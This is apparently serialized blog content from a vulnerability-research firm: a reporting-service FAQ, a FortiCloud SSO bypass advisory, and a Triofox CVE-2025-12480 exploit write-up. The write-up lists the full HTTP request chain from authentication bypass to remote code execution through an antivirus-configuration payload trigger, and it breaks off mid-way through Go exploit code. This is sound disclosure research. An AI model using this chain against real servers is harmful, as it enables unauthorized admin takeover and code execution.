Each software supplier has its own disclosure process, which can introduce unnecessary friction and, over time, lead to frustration or abandonment of coordinated disclosure altogether.",[18,19777,19778],{},"Common challenges we observe include:",[22,19780,19781,19784,19787,19790],{},[25,19782,19783],{},"Limited or inconsistent supplier security resources",[25,19785,19786],{},"Lack of responsiveness or a clear security contact",[25,19788,19789],{},"Lengthy validation and remediation workflows",[25,19791,19792],{},"Legal or policy concerns imposed on researchers",[18,19794,19795],{},"To address these issues, VulnCheck offers a free vulnerability reporting service designed to reduce the burden of disclosure and support researchers.",[61,19797,19799],{"id":19798},"why-report-a-vulnerability-to-vulncheck","Why Report a Vulnerability to VulnCheck?",[18,19801,19802],{},"VulnCheck works directly with researchers to coordinate disclosure and manage communications with affected suppliers. This minimizes the time and effort you spend navigating disclosure processes while ensuring vulnerabilities are handled responsibly and consistently. All of this is done while ensuring proper credit is given to the researcher.",[61,19804,19806],{"id":19805},"how-does-vulnchecks-report-a-vulnerability-service-work","How Does VulnCheck’s Report a Vulnerability Service Work?",[18,19808,19809],{},"Simply submit the technical details of your vulnerability to VulnCheck. We do not require a specific format and aim to keep initial questions to a minimum. 
That said, providing thorough technical detail helps us validate the issue and proceed efficiently.",[18,19811,19812,19813,19817,19818],{},"Once submitted, VulnCheck will handle the disclosure process and keep you informed at every stage.\nYou may submit a report via:\n",[47,19814,19816],{"href":2999,"rel":19815},[51],"Web portal","\nEmail: ",[47,19819,19821],{"href":19820},"mailto:disclosure@vulncheck.com","disclosure@vulncheck.com",[61,19823,19825],{"id":19824},"what-information-is-needed-when-reporting-a-vulnerability","What Information Is Needed When Reporting a Vulnerability?",[18,19827,19828],{},"Submissions can range from a public reference to an unidentified vulnerability to a full technical report with reproduction steps and proof of concept. At a minimum, we ask for enough information to either populate a CVE record or initiate coordination with the supplier.",[18,19830,19831],{},"When using the web form, you will be asked to provide:",[22,19833,19834,19837,19840,19843,19846,19849,19852,19855],{},[25,19835,19836],{},"Vendor name",[25,19838,19839],{},"Product name",[25,19841,19842],{},"Affected and tested version(s)",[25,19844,19845],{},"Vulnerability details: a clear description of the issue, its impact, and exploitation method, including reproduction steps and a proof of concept if available",[25,19847,19848],{},"Whether you would like VulnCheck to coordinate disclosure on your behalf",[25,19850,19851],{},"Whether you previously requested CVEs from MITRE without response",[25,19853,19854],{},"Whether the vulnerability has already been publicly disclosed (with references, if applicable)",[25,19856,19857],{},"Whether you plan to publish your findings on or after the coordinated disclosure date",[18,19859,19860],{},"Here is an example of a comprehensive CVD submission presented in a format that enables us to go quickly from intake to vendor outreach:",[18,19862,19863],{},[68,19864],{"alt":19865,"src":19866},"Report a Vulnerability 
Example","\u002Fblog\u002Freport-a-vulnerability\u002Freport-example.png",[61,19868,19870],{"id":19869},"what-timeline-should-i-expect-from-vulncheck","What Timeline Should I Expect From VulnCheck?",[18,19872,19873],{},"You should expect an analyst to engage with you within 1 business day.",[22,19875,19876,19879],{},[25,19877,19878],{},"CVE assignments for publicly disclosed issues or already-coordinated cases often occur within hours.",[25,19880,19881],{},"For coordinated disclosures, VulnCheck’s average time from initial report to public disclosure is approximately 48 days, well within our 120-day disclosure policy.",[61,19883,19885],{"id":19884},"will-vulncheck-assign-a-cve","Will VulnCheck Assign a CVE?",[18,19887,19888],{},"Yes. After appropriate coordination, VulnCheck will issue a CVE directly or work with the most appropriate CVE Numbering Authority, depending on scope and ownership.",[61,19890,19892],{"id":19891},"what-if-my-vulnerability-is-already-public-and-i-only-need-a-cve-id","What If My Vulnerability Is Already Public and I Only Need a CVE ID?",[18,19894,19895],{},"VulnCheck is a CVE Numbering Authority and can issue a CVE ID directly or coordinate assignment as needed.",[61,19897,19899],{"id":19898},"does-vulncheck-offer-a-bounty-payout","Does VulnCheck Offer a Bounty Payout?",[18,19901,19902],{},"No. 
VulnCheck does not provide financial incentives for vulnerability submissions.",[61,19904,19906],{"id":19905},"are-there-instances-where-vulncheck-will-not-perform-disclosure","Are There Instances Where VulnCheck Will Not Perform Disclosure?",[18,19908,19909],{},"There are limited circumstances in which VulnCheck will decline to coordinate disclosure:",[22,19911,19912,19920,19928,19936],{},[25,19913,19914,19915],{},"Not CVE-eligible\n",[22,19916,19917],{},[25,19918,19919],{},"We can help determine eligibility, but we do not coordinate disclosure for issues that do not qualify for CVE assignment.",[25,19921,19922,19923],{},"Unable to reproduce the issue\n",[22,19924,19925],{},[25,19926,19927],{},"If neither VulnCheck nor the supplier can validate the vulnerability after reasonable attempts, the case may be closed.",[25,19929,19930,19931],{},"Embargo violations\n",[22,19932,19933],{},[25,19934,19935],{},"If a researcher breaches an agreed embargo, VulnCheck may decline future coordination.",[25,19937,19938,19939],{},"Unethical or unauthorized discovery\n",[22,19940,19941],{},[25,19942,19943],{},"Vulnerabilities identified through testing on production systems without authorization will not be coordinated.",[61,19945,19947],{"id":19946},"is-vulnchecks-report-a-vulnerability-service-legally-binding","Is VulnCheck’s ‘Report a Vulnerability’ Service Legally Binding?",[18,19949,19950,19951,19955],{},"No - this service does not have any legal authority. We adhere to our ",[47,19952,19954],{"href":14795,"rel":19953},[51],"Vulnerability Disclosure Policy",". Participants are expected to respect mutual embargoes during coordinated disclosure. 
Researchers may choose to break an embargo at any time; however, VulnCheck reserves the right to refuse future service in such cases.",[61,19957,202],{"id":201},[18,19959,1228,19960,1234,19963,1240,19966,1246,19969,1255,19972,1260],{},[47,19961,1233],{"href":10806,"rel":19962},[51],[47,19964,1239],{"href":1237,"rel":19965},[51],[47,19967,1245],{"href":1243,"rel":19968},[51],[47,19970,1251],{"href":1249,"rel":19971},[51],[47,19973,216],{"href":1258,"rel":19974},[51],{"title":219,"searchDepth":220,"depth":220,"links":19976},[19977,19978,19979,19980,19981,19982,19983,19984,19985,19986],{"id":19798,"depth":220,"text":19799},{"id":19805,"depth":220,"text":19806},{"id":19824,"depth":220,"text":19825},{"id":19869,"depth":220,"text":19870},{"id":19884,"depth":220,"text":19885},{"id":19891,"depth":220,"text":19892},{"id":19898,"depth":220,"text":19899},{"id":19905,"depth":220,"text":19906},{"id":19946,"depth":220,"text":19947},{"id":201,"depth":220,"text":202},"2026-01-09","VulnCheck offers a free vulnerability reporting service designed to reduce the burden of disclosure and support researchers.",{"slug":19990},"report-a-vulnerability","\u002Fblog\u002Freport-a-vulnerability",{"title":19760,"description":19988},"blog\u002Freport-a-vulnerability",[242],"KaZGoUusChnNsI-flU7vQKLF2Oen7HFUi8dbdGSVhaU",{"id":19997,"title":19998,"articles":7,"authors":19999,"body":20002,"date":20166,"description":20167,"extension":234,"image":7,"link":7,"meta":20168,"navigation":237,"path":20170,"seo":20171,"series":7,"stem":20172,"subtype":7,"tags":20173,"__hash__":20174},"blog\u002Fblog\u002Fforticloud-sso-login-bypass.md","FortiCloud SSO Login Bypass Vulnerabilities Exploited in the 
Wild",[20000],{"name":256,"avatar":257,"link":258,"linkName":20001},"linkedin.com\u002Fin\u002Fccondon\u002F",{"type":15,"value":20003,"toc":20159},[20004,20026,20028,20044,20055,20058,20062,20080,20083,20096,20099,20108,20112,20119,20121,20142],[22,20005,20006,20020,20023],{},[25,20007,20008,20009,1246,20014,20019],{},"Fortinet disclosed two critical vulnerabilities (",[47,20010,20013],{"href":20011,"rel":20012},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-59718",[51],"CVE-2025-59718",[47,20015,20018],{"href":20016,"rel":20017},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-59719",[51],"CVE-2025-59719",") across multiple products on December 9, 2025.",[25,20021,20022],{},"The vulnerabilities allow unauthenticated adversaries to bypass FortiCloud SSO login authentication. Multiple security firms indicate they’ve observed exploitation in the wild.",[25,20024,20025],{},"VulnCheck’s research team has analyzed known public PoCs and determined they are fake or incomplete; defenders should avoid writing or alerting on detections for fake or non-functional PoCs that would not succeed in real-world attacks.",[61,20027,11273],{"id":11272},[18,20029,20030,20031,20036,20037,982,20040,20043],{},"On December 9, 2025, Fortinet published a critical ",[47,20032,20035],{"href":20033,"rel":20034},"https:\u002F\u002Fwww.fortiguard.com\u002Fpsirt\u002FFG-IR-25-647",[51],"security advisory"," on two CVEs affecting FortiOS, FortiProxy, FortiSwitchManager, and FortiWeb. 
",[47,20038,20013],{"href":20011,"rel":20039},[51],[47,20041,20018],{"href":20016,"rel":20042},[51]," have identical descriptions and affected products; the vulnerabilities arise from an improper verification of cryptographic signature issue that allows unauthenticated attackers to bypass FortiCloud SSO login authentication “via a crafted SAML message,” if FortiCloud SSO login is enabled on the device.",[18,20045,20046,20047,20051,20052,20054],{},"Per the ",[47,20048,20050],{"href":20033,"rel":20049},[51],"vendor advisory",": ",[1823,20053],{},"\n> Please note that the FortiCloud SSO login feature is not enabled in default factory settings. However, when an administrator registers the device to FortiCare from the device's GUI, unless the administrator disables the toggle switch \"Allow administrative login using FortiCloud SSO\" in the registration page, FortiCloud SSO login is enabled upon registration.",[18,20056,20057],{},"Both vulnerabilities were discovered internally at Fortinet and were not (to our current knowledge) exploited in the wild at time of disclosure.",[61,20059,20061],{"id":20060},"reports-of-exploitation-in-the-wild","Reports of exploitation in the wild",[18,20063,20064,20065,982,20070,20075,20076,20079],{},"Security firms ",[47,20066,20069],{"href":20067,"rel":20068},"https:\u002F\u002Farcticwolf.com\u002Fresources\u002Fblog\u002Farctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719\u002F",[51],"Arctic Wolf",[47,20071,20074],{"href":20072,"rel":20073},"https:\u002F\u002Fwww.linkedin.com\u002Fposts\u002Fdrayagha_for-the-latest-fortigate-cves-cve-2025-59718-activity-7407214356226281473-K0vf",[51],"Huntress"," have both indicated they’ve observed malicious activity related to these issues; Arctic Wolf said they began seeing “malicious SSO logins on Fortigate appliances” on December 12, three days after the CVEs were disclosed. 
Huntress also noted specific post-exploitation behavior, namely that adversaries are dumping exploited device configurations after bypassing SSO authentication. Both vulnerabilities were added to ",[47,20077,1233],{"href":1231,"rel":20078},[51]," as of December 15, based on the Arctic Wolf report. CISA added CVE-2025-59718 (but not the second CVE) to their KEV on December 16.",[61,20081,20082],{"id":11509},"VulnCheck research observations",[18,20084,20085,20086,10515,20090,20095],{},"Based on our team’s analysis, the two ",[47,20087,15019],{"href":20088,"rel":20089},"https:\u002F\u002Fgithub.com\u002FAshwesker\u002FBlackash-CVE-2025-59718",[51],[47,20091,20094],{"href":20092,"rel":20093},"https:\u002F\u002Fgithub.com\u002Fexfil0\u002FCVE-2025-59718-PoC",[51],"PoCs"," for CVE-2025-59718 (as of December 18) are fake or otherwise incomplete. Neither was functional in testing across a range of affected products and configurations. As of 8 AM EST on December 18, we’re not aware of any valid public PoCs for either vulnerability.",[18,20097,20098],{},"We’ve observed a relatively high degree of chatter across social media platforms and industry groups about exploitation of one or both CVEs. At least a subset of these claims, however, appears to be based on detections of non-functional PoCs, meaning that those attacks would not succeed in a real-world environment. Threat research and security teams should avoid relying on detections written against known-fake or otherwise invalid PoCs.",[18,20100,20101,20102,20107],{},"Our team also developed targeted ASM queries for Initial Access Intelligence customers that look for the FortiCloud SSO login button on the system's login page — a UI button that's present only if the ",[47,20103,20106],{"href":20104,"rel":20105},"https:\u002F\u002Fdocs.fortinet.com\u002Fdocument\u002Ffortigate\u002F7.6.3\u002Fadministration-guide\u002F135321\u002Fforticloud-sso",[51],"FortiCloud SSO feature"," is enabled as a login option. 
In our testing, the button disappeared once the feature was disabled. Interestingly, exposure results using this method are extremely low (under 100 at most), and in Shodan's case absent altogether.",[61,20109,20111],{"id":20110},"mitigation-guidance","Mitigation guidance",[18,20113,20114,20115,20118],{},"A full list of affected products and versions is available in the ",[47,20116,20050],{"href":20033,"rel":20117},[51],". Organizations should disable the FortiCloud login feature until they are able to update to a fixed version and look for unexpected logins, particularly for the admin user. Updating to a fixed version, of course, does not eradicate threat actors from compromised environments.",[61,20120,202],{"id":201},[18,20122,20123,20124,1246,20130,1255,20137,59],{},"The VulnCheck research team is always looking for new vulnerabilities to analyze and curate. For more research like this check out our blogs ",[1131,20125,20126],{},[47,20127,20129],{"href":10782,"rel":20128},[51],"Frost Checks First: Selective Exploitation",[1131,20131,20132],{},[47,20133,20136],{"href":20134,"rel":20135},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Freacting-to-shells-react2shell-variants-ecosystem",[51],"Reacting to Shells: React2Shell Variants and the CVE-2025-55182 Exploit Ecosystem",[1131,20138,20139],{},[47,20140,19437],{"href":19435,"rel":20141},[51],[18,20143,1228,20144,1234,20147,1240,20150,1246,20153,1255,20156,1260],{},[47,20145,1233],{"href":1231,"rel":20146},[51],[47,20148,1239],{"href":1237,"rel":20149},[51],[47,20151,1245],{"href":1243,"rel":20152},[51],[47,20154,1251],{"href":1249,"rel":20155},[51],[47,20157,216],{"href":1258,"rel":20158},[51],{"title":219,"searchDepth":220,"depth":220,"links":20160},[20161,20162,20163,20164,20165],{"id":11272,"depth":220,"text":11273},{"id":20060,"depth":220,"text":20061},{"id":11509,"depth":220,"text":20082},{"id":20110,"depth":220,"text":20111},{"id":201,"depth":220,"text":202},"2025-12-18","Fortinet disclosed two critical 
vulnerabilities on December 9 that arise from improper cryptographic signature verification and enable remote attackers to bypass SSO login on vulnerable devices. The vulnerabilities are being exploited in the wild.",{"slug":20169},"forticloud-sso-login-bypass","\u002Fblog\u002Fforticloud-sso-login-bypass",{"title":19998,"description":20167},"blog\u002Fforticloud-sso-login-bypass",[1280,242,1279],"tSQuHbGo39cvaHAOg1b7PKOqwV9enA6vhIAcat4kQHM",{"id":20176,"title":10339,"articles":20177,"authors":20183,"body":20185,"date":20166,"description":21157,"extension":234,"image":7,"link":7,"meta":21158,"navigation":237,"path":21160,"seo":21161,"series":7,"stem":21162,"subtype":7,"tags":21163,"__hash__":21164},"blog\u002Fblog\u002Ftriofox-exploit-CVE-2025-12480.md",[20178],{"title":20179,"source":20180,"link":20181,"date":20182},"Malicious Code Executed Through Gladinet Triofox 0-Day Vulnerability Exploited by Hackers","CyberPress","https:\u002F\u002Fcyberpress.org\u002Fgladinet-triofox-0-day-vulnerability\u002F","2025-12-19",[20184],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":20186,"toc":21149},[20187,20190,20193,20208,20212,20219,20228,20231,20235,20256,20259,20262,20268,20271,20286,20289,20300,20303,20307,20310,20313,20316,20322,20329,20335,20338,20349,20352,20358,20368,20374,20377,20383,20386,20389,20393,20400,20403,20549,20552,20569,20572,21094,21098,21101,21107,21116,21118,21129,21146],[263,20188],{":list":20189,"ico":266,"title":20},"[\"CVE-2025-12480 is a critical remote code execution vulnerability in Gladinet Triofox that was exploited as a zero-day by a threat actor tracked as UNC6485.\",\"VulnCheck's Initial Access Intelligence team analyzed the vulnerability, reproduced the attack, and created an original exploit that follows the same attack path and pattern as the real-world adversary.\",\"This blog shares attack observations and implementation details from our exploit, which fully emulates the adversary interaction over more than 
20 requests, abuses antivirus configuration as a trigger, and leverages an embedded PostgreSQL server for callbacks. In other words: Exploitation is hard even when it might seem like it's not.\"]",[18,20191,20192],{},"Exploitation can often appear simple when analyzed from a post-exploitation perspective or post-patch release, but much of cybersecurity is about those subtleties that can mask complexity required for real world attacks. It's valuable to look at the seemingly simple exploits that have been developed only up to the minimum standard required for a functional attack and look at the \"just\" statements that hide the complications and choices an attacker makes.",[18,20194,20195,20196,20201,20202,20207],{},"Recently Mandiant Threat Defense identified active exploitation of ",[47,20197,20200],{"href":20198,"rel":20199},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Ftriofox-vulnerability-cve-2025-12480",[51],"a zero-day in Gladinet's Triofox file-sharing and remote access platform"," that our Initial Access Intelligence team reproduced for our clients. Other researchers also identified that ",[47,20203,20206],{"href":20204,"rel":20205},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002F5C4wRy6hY7\u002Fcve-2025-12480\u002Frapid7-analysis",[51],"the application shared much functionality (and vulnerabilities) with the Gladinet CentreStack application",". During reproduction and exploit creation, the VulnCheck team made the decision to ignore the bug overlap and instead see if we could reproduce and write an exploit that matched the Mandiant analysis as closely as possible. 
This turned out to be an excellent case study in how writeups and public analysis can make a complex attack seem simple; as always, however, the details are what matter in real-world exploitation scenarios.",[61,20209,20211],{"id":20210},"triofox-vulnerability-primer","Triofox Vulnerability Primer",[18,20213,20214,20215,20218],{},"The original Mandiant vulnerability ",[47,20216,1017],{"href":20198,"rel":20217},[51]," explains that the vulnerability arises from an incorrect local host header check that then allows an attacker to reach pages that are used for the initial configuration of Triofox. With that access, the writeup states, the attacker reaches the database configuration page, which then leads to the admin account creation page, and a new database and admin account are created by the attacker, giving them access to the administrative user account. Finally, the attacker modified the anti-virus configuration to achieve remote code execution.",[18,20220,20221,20222,20224],{},"The analysis provides the following exploitation chain diagram (diagram via Mandiant):",[1823,20223],{},[68,20225],{"alt":20226,"src":20227},"Mandiant summary of exploit chain","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-mandiant.png",[18,20229,20230],{},"The reason this is interesting is that this is a simplification of the reality of the attack. It is excellent for incident response and detection, but here on the VulnCheck Initial Access Intelligence team, we want shells. 
This simplification provides us a useful framework to look at some of the decision making steps the attackers had to make and how these simplifications mask the complexity of exploitation.",[61,20232,20234],{"id":20233},"just-reset-the-database","\"Just\" Reset the Database",[18,20236,20237,20238,20241,20242,20245,20246,20248,20249,20251,20252,4606],{},"One of the root cause components of the vulnerability is an authentication bypass that arises from faulty validation when checking whether a request is coming from ",[886,20239,20240],{},"localhost"," in order to allow administrators to reset the settings from the local interface of the server.  The developers did not validate whether the host was ",[1131,20243,20244],{},"actually"," the local system, only that the ",[886,20247,6301],{}," header was set to ",[886,20250,20240],{},". What is missing from current public analysis is this very short blurb from the original ",[47,20253,1017],{"href":20254,"rel":20255},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Ftriofox-vulnerability-cve-2025-12480\u002F",[51],[18,20257,20258],{},"By following the setup process and creating a new database via the AdminDatabase.aspx page, access is granted to the admin initialization page, AdminAccount.aspx, which then redirects to the InitAccount.aspx page to create a new admin account.",[18,20260,20261],{},"The analysis here is technically correct, but does not elaborate on a few critical details that turn out to be real issues for weaponizing an exploit. First, if the target Triofox installation is using the default embedded database, re-selecting that option does not reconfigure the database and does not allow for an attacker to reset the admin credentials. 
Second, when the attacker selects the other databases, they must actually have a database accessible for the Triofox server to reach out to and utilize.",[18,20263,20264],{},[68,20265],{"alt":20266,"src":20267},"Triofox database options","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-database-options.jpg",[18,20269,20270],{},"Our testing revealed that in the default configuration an attacker could not rely on the database configuration page to indicate the default configuration, meaning that a password reset action would not be available to an attacker using the Triofox embedded database — meaning that the attacker found a different way around this, only targeted systems that used the external database configuration, or deployed their own database systems for configuration.",[18,20272,20273,20274,20279,20280,20285],{},"Since we wanted to reproduce the same path to remote code execution as ",[47,20275,20278],{"href":20276,"rel":20277},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Func6485",[51],"UNC6485",", this presented us with a problem. How could we make this exploit work without having to set up a database? 
Answer: We didn't, and instead we embedded an entire PostgreSQL server configuration in our go-exploit artifact via the Go ",[47,20281,20284],{"href":20282,"rel":20283},"https:\u002F\u002Fgithub.com\u002Ffergusstrange\u002Fembedded-postgres\u002F",[51],"embedded-postgres"," package!",[18,20287,20288],{},"Assuming the attacker did successfully set up a rogue database server, our team still encountered a few other things that an adversary (or an exploit dev) would have needed to contend with — and it’s still not clear how the attackers approached these in the real world:",[22,20290,20291,20294,20297],{},[25,20292,20293],{},"The database would either be completely reset or no longer configured for the system, leaving it in a dirty state and making the exploitation extremely obvious if anyone attempts to use the system.",[25,20295,20296],{},"Previous database settings and configurations are not able to be trivially restored (with one exception that we will get to later).",[25,20298,20299],{},"Artifacts are created during exploitation that point directly to attacker infrastructure, which might deter an adversary desiring stealth.",[18,20301,20302],{},"If the embedded database was used previously by the application, another call to the database configuration (using the same local host header bypass) would allow for the server to return to the previous configuration state. This allows an attacker to reset the configuration post-exploitation even if the database was changed.",[61,20304,20306],{"id":20305},"just-upload-a-set-of-payloads","\"Just\" Upload a Set of Payloads",[18,20308,20309],{},"The Mandiant analysis also notes that malicious files were uploaded and executed:",[18,20311,20312],{},"To achieve code execution, the attacker logged in using the newly created Admin account. The attacker uploaded malicious files to execute them using the built-in anti-virus feature.",[18,20314,20315],{},"\"Uploaded malicious files\" could mean many things in the context of Triofox. 
After all, the product supports many upload types and by default does not have enabled shares. When trying to create a network share to follow this part of the attack chain, an attacker would have to create a network share via the following set of options:",[18,20317,20318],{},[68,20319],{"alt":20320,"src":20321},"Triofox local file configuration","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftrifox-share-ntfs.jpg",[18,20323,20324,20325,20328],{},"Reducing infrastructure visibility and other exposures is critical to threat actors wanting to mask their identities, so the most obvious choice would be to select the local folder or share. This is where we hit another obstacle: creation of a local share either requires Triofox permissions or NTFS local inherited permissions. These require either entering local credentials or explicitly giving the Triofox-running user permission (if the NTFS permissions are inherited). Below is an example of what occurs when we attempt to create a new share with inherited permissions to ",[886,20326,20327],{},"C:\\"," and grant all users all permissions:",[18,20330,20331],{},[68,20332],{"alt":20333,"src":20334},"Triofox local file configuration error","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftrifox-share-ntfs-error.jpg",[18,20336,20337],{},"So, we are either missing a step here or the attacker figured out something that wasn't obvious. We need to find a way to get a share, so we tried a few things that all failed:",[22,20339,20340,20343,20346],{},[25,20341,20342],{},"Attempted to use UNC path names to the local host to a location",[25,20344,20345],{},"Created a path we know is world-writable",[25,20347,20348],{},"Created a new Triofox low-privilege user, used only Triofox permissions, and granted access",[18,20350,20351],{},"Not wanting to rely on a cloud instance, we started to investigate if there were any alternatives to using the default share logic. 
This is when we discovered that Triofox offered a setting to enable \"Personal Home Drives\" that was not enabled by default.",[18,20353,20354],{},[68,20355],{"alt":20356,"src":20357},"Triofox personal home drive configuration page","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-personal-home-drive.png",[18,20359,20360,20361,20364,20365,20367],{},"Interestingly, and unlike the share settings, the application allows you to configure the home drive to a path and ",[1131,20362,20363],{},"will happily allow omitting a username and password",". Simply setting ",[886,20366,20327],{}," or the Windows drive and leaving the username and password blank will allow the attacker to enable the home drive in a known writable location.",[18,20369,20370],{},[68,20371],{"alt":20372,"src":20373},"Triofox personal home drive post-enablement page","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-personal-home-drive-enabled.png",[18,20375,20376],{},"Then, visiting the \"My Files\" page in the UI, we can see we now have permissions to the Windows drive and testing shows that we have the expected write and file creation permissions.",[18,20378,20379],{},[68,20380],{"alt":20381,"src":20382},"Successfully accessing Windows C drive from personal home drive","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480\u002Ftriofox-personal-home-success.png",[18,20384,20385],{},"There are, of course, likely other ways to achieve file uploads, but not knowing which one was utilized by the threat actor, we decided to prioritize a path that doesn't require the attacker to configure additional infrastructure or settings.",[18,20387,20388],{},"Now we can upload our payload files and move on to the antivirus configuration modification, which is a “simple” modification of the ESET command line parameters with the caveat that the ESET arguments can only point to a single executable, with no arguments that will be scanned by ESET. 
We added support for creating a staged VisualBasic reverse HTTP shell and an EXE dropper and moved on to the next steps: functionally completing the attack chain manually through the UI with assistance from a web proxy.",[61,20390,20392],{"id":20391},"just-handle-aspnet-state","\"Just\" Handle ASP.NET State",[18,20394,20395,20396,20399],{},"With the upload and antivirus part of the chain completed, we then moved on to automating the attack and maturing our exploit, which includes ensuring that HTTP requests all chain together properly. This is where another \"just\" rears its head in a way that is common during n-day vulnerability reproduction. ASP.NET is a classic example of a web framework that attempts to keep its state client-side and is infamously annoying because it requires juggling state variables such as our old friend ",[886,20397,20398],{},"__VIEWSTATE",". Each request that requires a state change in ASP.NET-developed applications will often require a multi-request process for manual web interaction, such as clicking a next button or a dropdown menu that generates a large volume of requests that have to be accounted for.",[18,20401,20402],{},"A quick enumeration of the steps shows that this exploit requires roughly 23 HTTP requests to go from authentication bypass to remote code execution. 
The full workflow for exploitation is the following set of HTTP requests:",[1789,20404,20405,20411,20417,20422,20428,20434,20440,20449,20455,20464,20473,20479,20485,20491,20497,20505,20511,20517,20522,20528,20534,20539,20544],{},[25,20406,20407,20410],{},[886,20408,20409],{},"GET \u002Fmanagement\u002FAdminDatabase.aspx"," - Retrieve admin database reset page with bypass",[25,20412,20413,20416],{},[886,20414,20415],{},"POST \u002Fmanagement\u002FAdminDatabase.aspx"," - Select PSQL",[25,20418,20419,20421],{},[886,20420,20415],{}," - Submit attacker-controlled configuration",[25,20423,20424,20427],{},[886,20425,20426],{},"GET \u002Fmanagement\u002FAdminAccount.aspx"," - Follow redirect to servo endpoints and admin configuration",[25,20429,20430,20433],{},[886,20431,20432],{},"GET \u002Fmanagement\u002Fservo\u002FInitAccount.aspx"," - Retrieve ASP state data for account creation",[25,20435,20436,20439],{},[886,20437,20438],{},"POST \u002Fmanagement\u002Fservo\u002FInitAccount.aspx"," - Create the account",[25,20441,20442,20445,20446],{},[886,20443,20444],{},"POST\u002Fmanagement\u002Fservo\u002FInitAccount.aspx"," - Finalize the account and redirect to ",[886,20447,20448],{},"InitAD",[25,20450,20451,20454],{},[886,20452,20453],{},"GET \u002Fmanagement\u002Fservo\u002FInitAd.aspx"," - ASP state data for AD configuration",[25,20456,20457,20460,20461],{},[886,20458,20459],{},"POST \u002Fmanagement\u002Fservo\u002FInitAd.aspx"," - Select No AD configuration redirect to ",[886,20462,20463],{},"InitSvrs",[25,20465,20466,20469,20470],{},[886,20467,20468],{},"GET \u002Fmanagement\u002Fservo\u002FInitSvrs.aspx"," - Follow redirect to ",[886,20471,20472],{},"ServoCheckout.aspx",[25,20474,20475,20478],{},[886,20476,20477],{},"GET \u002Fmanagement\u002Fservo\u002FServoCheckout.aspx?t=1"," - Commit changes from Checkout and get state\u002Ftoken cookies for authentication",[25,20480,20481,20484],{},[886,20482,20483],{},"GET \u002Fmanagement\u002Fclustermgrconsole"," - Redirect to 
administrative page. Admin access obtained.",[25,20486,20487,20490],{},[886,20488,20489],{},"GET \u002Fmanagement\u002Fservo\u002FServoHomeDriveEnable.aspx"," - Retrieve the \"Home Drive\" administrative page and ASP state",[25,20492,20493,20496],{},[886,20494,20495],{},"POST \u002Fmanagement\u002Fservo\u002FServoHomeDriveEnable.aspx"," - Select home drive enablement",[25,20498,20499,20501,20502],{},[886,20500,20495],{}," - Set home drive to ",[886,20503,20504],{},"C:",[25,20506,20507,20510],{},[886,20508,20509],{},"PUT \u002Fnamespace\u002Fn.svc\u002Fjsondir\u002F?_rnd=\u003Crandom>"," - Create directory in home drive",[25,20512,20513,20516],{},[886,20514,20515],{},"PUT \u002Fstorage\u002Fproxiedupload.up"," - Create and upload .bat file containing call to VBS payload",[25,20518,20519,20521],{},[886,20520,20515],{}," - Create and upload VBS payload",[25,20523,20524,20527],{},[886,20525,20526],{},"GET \u002Fmanagement\u002FAntiVirus.aspx"," - Retrieve ASP state from antivirus configuration page",[25,20529,20530,20533],{},[886,20531,20532],{},"POST \u002Fmanagement\u002FAntiVirus.aspx"," - Select the edit button and update ASP state",[25,20535,20536,20538],{},[886,20537,20532],{}," - Select ESET AV option",[25,20540,20541,20543],{},[886,20542,20532],{}," - Point ESET target to .bat payload",[25,20545,20546,20548],{},[886,20547,20515],{}," - Upload another file to trigger .bat",[18,20550,20551],{},"And for good measure we also need to use our trick to reset the database at the end of a successful attack, meaning we send 3 additional requests in a successful attack for a grand total of 26 requests to keep state throughout the exploit.",[18,20553,20554,20555,20559,20560,20564,20565,20568],{},"Since we obviously want to reduce the pain of having to manually track state, we updated VulnCheck’s open-source exploitation framework ",[47,20556,20558],{"href":14297,"rel":20557},[51],"go-exploit"," with ",[47,20561,20563],{"href":14297,"rel":20562},[51],"a simple set of 
ASP.NET state helpers"," to allow a call to ",[886,20566,20567],{},"UpdateState"," that handles the HTML XPath parsing and parameter retrieval automatically. This reduces manual lookups and lets us focus only on the non-ASP.NET state parameters that actually matter for exploitation.",[18,20570,20571],{},"This allows us to request the pages like any other request, but dynamically update the state on each response, automatically handling the ASP.NET state variables:",[1354,20573,20575],{"className":19022,"code":20574,"language":19024,"meta":219,"style":219},"state := aspnet.State{}\nresp, body, ok := protocol.HTTPSendAndRecvWith(\"GET\", conf.GenerateURL(\"\u002Fmanagement\u002FAdminDatabase.aspx\"), \"\")\nif !ok {\n    output.PrintError(\"Could not retrieve to the admin database endpoint\")\n\n    return false\n}\n\nstate.Update(body)\n\n\u002F\u002F Now only the parameters that are required can be utilized and no special body parsing\n\u002F\u002F for __VIEWSTATE and friends is required.\np := state.MergeParams(map[string]string{\n    \"__EVENTTARGET\":                      \"ctl00$MainContent$DatabaseType\",\n    \"ctl00%24MainContent%24DatabaseType\": \"psql\",\n})\nparams := protocol.CreateRequestParamsEncoded(p)\nheaders[\"Content-Type\"] = \"application\u002Fx-www-form-urlencoded\"\nresp, body, ok = protocol.HTTPSendAndRecvWithHeaders(\"POST\", conf.GenerateURL(\"\u002Fmanagement\u002FAdminDatabase.aspx\"), params, headers)\nif !ok {\n    output.PrintError(\"Could not POST to the admin database endpoint\")\n\n    return false\n}\n\n\u002F\u002F Update the state from the previous POST response, this time we only want the states and have no content\nstate.Update(body)\n\u002F\u002F params, resp, body and ok are already declared above, so plain assignment is used here\nparams = protocol.CreateRequestParamsEncoded(state.AsParams())\nresp, body, ok = protocol.HTTPSendAndRecvWithHeaders(\"POST\", 